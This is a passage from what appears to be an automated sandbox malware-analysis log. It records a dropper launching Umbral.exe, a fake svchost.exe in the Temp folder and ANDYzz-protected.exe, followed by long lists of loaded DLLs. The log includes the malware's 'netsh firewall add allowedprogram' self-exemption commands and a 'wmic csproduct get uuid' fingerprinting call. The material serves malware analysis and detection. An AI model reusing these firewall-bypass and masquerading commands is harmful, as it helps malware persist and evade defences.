              Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
              Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall delete allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe"
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
              Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe" Jump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe "C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLEJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall delete allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLEJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
